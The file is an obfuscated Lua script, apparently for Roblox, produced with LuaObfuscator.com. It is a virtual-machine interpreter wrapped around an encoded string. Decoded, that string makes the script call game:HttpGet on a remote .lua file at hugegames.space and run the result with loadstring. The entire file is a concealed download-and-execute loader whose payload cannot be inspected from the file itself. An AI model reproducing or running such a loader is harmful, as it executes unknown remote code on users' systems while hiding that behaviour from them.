--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=v5(v69,v19);v19=nil;return v75;else return v69;end end end);local function v20(v31,v32,v33) if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + ((98 + 522) -((1432 -(282 + 595)) + 64)))) ;return v70-(v70%(932 -(857 + 74))) ;else local v71=2^(v32-(569 -(367 + 201))) ;return (((v31%(v71 + v71))>=v71) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(1638 -(1523 + 114))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1271 -((984 -758) + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + ((359 -(87 + 263)) -5) ;return (v41 * (31011612 -14234396)) + (v40 * (65716 -(67 + 113))) + (v39 * (469 -(157 + 56))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 ,79 -59 ) * ((954 -(802 + 150))^32)) + v42 ;local v46=v20(v43,21,83 -52 );local v47=((v20(v43,57 -25 )==1) and  -(1 + 0)) or ((1789 -(368 + 423)) -(915 + 82)) ;if (v46==(0 -0)) then if (v45==(0 + (0 -0))) then return v47 * (0 -0) ;else v46=1188 -((1087 -(10 + 8)) + 118) ;v44=0;end elseif (v46==(4643 -2596)) then return ((v45==0) and (v47 * (((3 -2) -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 26)) ) * (v44 + (v45/((3 -1)^(52 + 0)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v67=1 -0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(585 -(57 + 527))) then else v54=nil;v55=nil;v51=1429 -(41 + 1386) ;end if (v51~=(107 -(17 + 86))) then else while true do if (v52~=(1 + 0)) then else local v93=0 + 0 ;while true do if (v93~=(0 -0)) then else v55=nil;v56=nil;v93=1 -0 ;end if (v93~=1) then else v52=5 -3 ;break;end end end if (v52==(0 -0)) then local v94=0;while true do if (v94==(2 -1)) then v52=1 + 0 ;break;end if (v94~=(0 + 0)) then else v53=396 -(115 + 281) ;v54=nil;v94=1;end end end if (v52==(6 -3)) then v59=nil;while true do local v95=0 + 0 ;local v96;while true do if (v95==0) then v96=0;while true do if (v96==(2 -1)) then if (v53==(0 -0)) then local v137=0;while true do if (v137==1) then local v145=0;while true do if (v145~=(1 + 0)) then else v137=869 -(550 + 317) ;break;end if (v145==0) then local v147=65 -(30 + 35) ;while true do if (v147~=(0 + 0)) then else v56={};v57={v54,v55,nil,v56};v147=2 -1 ;end if (1~=v147) then else v145=286 -(134 + 151) ;break;end end end end end if ((1665 -(970 + 695))~=v137) then else local v146=0;while true do if ((0 -0)~=v146) then else v54={};v55={};v146=1991 -(582 + 1408) ;end if (v146==(3 -2)) then v137=2 -1 ;break;end end end if (v137~=(2 -0)) then else v53=3 -2 ;break;end end end break;end if (v96~=0) then else if (v53~=(321 -(53 + 267))) then else local v138=0 + 0 ;local v139;while true do if (v138~=0) then else v139=413 -(15 + 398) ;while true do if (v139~=2) then else v53=984 -(18 + 964) ;break;end if (v139~=(3 -2)) then else for v150=1825 -(1195 + 629) ,v58 do local v151=0;local v152;local v153;local v154;while true do if (v151~=(0 + 0)) then else local v157=0 -0 ;while true do if (v157~=(242 -(187 + 54))) then else v151=1;break;end if (v157~=(780 -(162 + 618))) then else v152=0;v153=nil;v157=1 + 0 ;end end end if (v151~=(1 + 0)) then else v154=nil;while true do if ((0 + 0)~=v152) then else local v158=0 -0 ;while true do if (v158==0) then v153=v21();v154=nil;v158=1;end if ((127 -(116 + 10))~=v158) then else v152=1 -0 ;break;end end end if (v152~=(1 + 0)) then else if (v153==1) then v154=v21()~=(1636 -(1373 + 263)) ;elseif (v153==2) then v154=v24();elseif (v153==(1003 -(451 + 549))) then v154=v25();end v59[v150]=v154;break;end end break;end end end v57[6 -3 ]=v21();v139=2;end if (v139~=(0 + 0)) then else local v149=0 + 0 ;while true do if (v149~=(1 -0)) then else v139=1;break;end if (v149==(0 + 0)) then v58=v23();v59={};v149=1;end end end end break;end end end if (2==v53) then local v140=0 + 0 ;local v141;local v142;while true do if (1==v140) then while true do if (v141==0) then v142=0 -0 ;while true do local v155=0 -0 ;local v156;while true do if (v155==(1384 -(746 + 638))) then v156=0 -0 ;while true do if (v156==0) then if (v142~=(0 + 0)) then else local v160=0 -0 ;local v161;while true do if (v160~=(0 -0)) then else v161=341 -(218 + 123) ;while true do if ((1582 -(1535 + 46))==v161) then v142=1;break;end if (v161==(0 + 0)) then for v162=2 -1 ,v23() do local v163=377 -(142 + 235) ;local v164;local v165;local v166;while true do if ((0 + 0)~=v163) then else v164=560 -(306 + 254) ;v165=nil;v163=1 + 0 ;end if (v163~=(1 -0)) then else v166=nil;while true do if ((1 -0)==v164) then while true do if (v165==0) then v166=v21();if (v20(v166,1 + 0 ,1 + 0 )~=(1467 -(899 + 568))) then else local v170=0;local v171;local v172;local v173;while true do if (v170==(1 + 0)) then v173={v22(),v22(),nil,nil};if (v171==(290 -(60 + 230))) then local v177=572 -(426 + 146) ;local v178;while true do if (v177==(0 + 0)) then v178=0;while true do if ((0 -0)~=v178) then else v173[7 -4 ]=v22();v173[8 -4 ]=v22();break;end end break;end end elseif (v171==(1457 -(282 + 1174))) then v173[3]=v23();elseif (v171==(813 -(569 + 242))) then v173[14 -11 ]=v23() -((5 -3)^(1 + 15)) ;elseif (v171~=3) then else local v189=0;while true do if ((1024 -(706 + 318))==v189) then v173[2 + 1 ]=v23() -((1253 -(721 + 530))^(12 + 4)) ;v173[1275 -(945 + 326) ]=v22();break;end end end v170=4 -2 ;end if (v170~=(0 + 0)) then else local v174=731 -(476 + 255) ;while true do if (v174==(701 -(271 + 429))) then v170=1 + 0 ;break;end if (v174==(1500 -(1408 + 92))) then v171=v20(v166,2,3);v172=v20(v166,4,6);v174=1 -0 ;end end end if (v170==(1089 -(461 + 625))) then if (v20(v172,3,3)==(1 -0)) then v173[1292 -(993 + 295) ]=v59[v173[1 + 3 ]];end v54[v162]=v173;break;end if (v170==(1173 -(418 + 753))) then local v176=0 + 0 ;while true do if (v176==(0 + 0)) then if (v20(v172,337 -(144 + 192) ,1)==(1 + 0)) then v173[218 -(42 + 174) ]=v59[v173[2]];end if (v20(v172,1 + 1 ,531 -(406 + 123) )~=(1770 -(1749 + 20))) then else v173[1507 -(363 + 1141) ]=v59[v173[3]];end v176=1;end if (v176==(1 + 0)) then v170=3;break;end end end end end break;end end break;end if ((1322 -(1249 + 73))~=v164) then else local v169=0;while true do if (v169~=(0 + 0)) then else v165=1145 -(466 + 679) ;v166=nil;v169=2 -1 ;end if (v169==(2 -1)) then v164=1901 -(106 + 1794) ;break;end end end end break;end end end for v167=1 + 0 ,v23() do v55[v167-(1 + 0) ]=v28();end v161=1976 -(1913 + 62) ;end end break;end end end if (v142~=(1 + 0)) then else return v57;end break;end end break;end end end break;end end break;end if (0==v140) then v141=0 -0 ;v142=nil;v140=1 + 0 ;end end end v96=3 -2 ;end end break;end end end break;end if (v52~=(1663 -(1477 + 184))) then else v57=nil;v58=nil;v52=3;end end break;end if (v51~=(3 -0)) then else v58=nil;v59=nil;v51=4;end if (v51~=0) then else v52=0 -0 ;v53=nil;v51=2 -1 ;end if (v51==(116 -(4 + 110))) then v56=nil;v57=nil;v51=3;end end end local function v29(v60,v61,v62) local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=3) then if (v89<=1) then if (v89>0) then v86[v88[2]]=v88[3];else do return;end end elseif (v89==2) then local v103;local v104,v105;local v106;local v107;v86[v88[2]]=v62[v88[3]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v62[v88[3]];v80=v80 + 1 ;v88=v76[v80];v107=v88[2];v106=v86[v88[3]];v86[v107 + 1 ]=v106;v86[v107]=v106[v88[4]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v107=v88[2];v104,v105=v79(v86[v107](v13(v86,v107 + 1 ,v88[3])));v81=(v105 + v107) -1 ;v103=0;for v130=v107,v81 do v103=v103 + 1 ;v86[v130]=v104[v103];end v80=v80 + 1 ;v88=v76[v80];v107=v88[2];v86[v107]=v86[v107](v13(v86,v107 + 1 ,v81));v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]();v80=v80 + 1 ;v88=v76[v80];do return;end else local v117=0;local v118;while true do if (0==v117) then v118=v88[2];v86[v118]=v86[v118](v13(v86,v118 + 1 ,v81));break;end end end elseif (v89<=5) then if (v89==4) then v86[v88[2]]=v62[v88[3]];else local v121=v88[2];local v122=v86[v88[3]];v86[v121 + 1 ]=v122;v86[v121]=v122[v88[4]];end elseif (v89>6) then v86[v88[2]]();else local v126=v88[2];local v127,v128=v79(v86[v126](v13(v86,v126 + 1 ,v88[3])));v81=(v128 + v126) -1 ;local v129=0;for v133=v126,v81 do local v134=0;while true do if (0==v134) then v129=v129 + 1 ;v86[v133]=v127[v129];break;end end end end v80=v80 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F64326239316633622O3761623038623437363365623734642E6C756100083O0012023O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
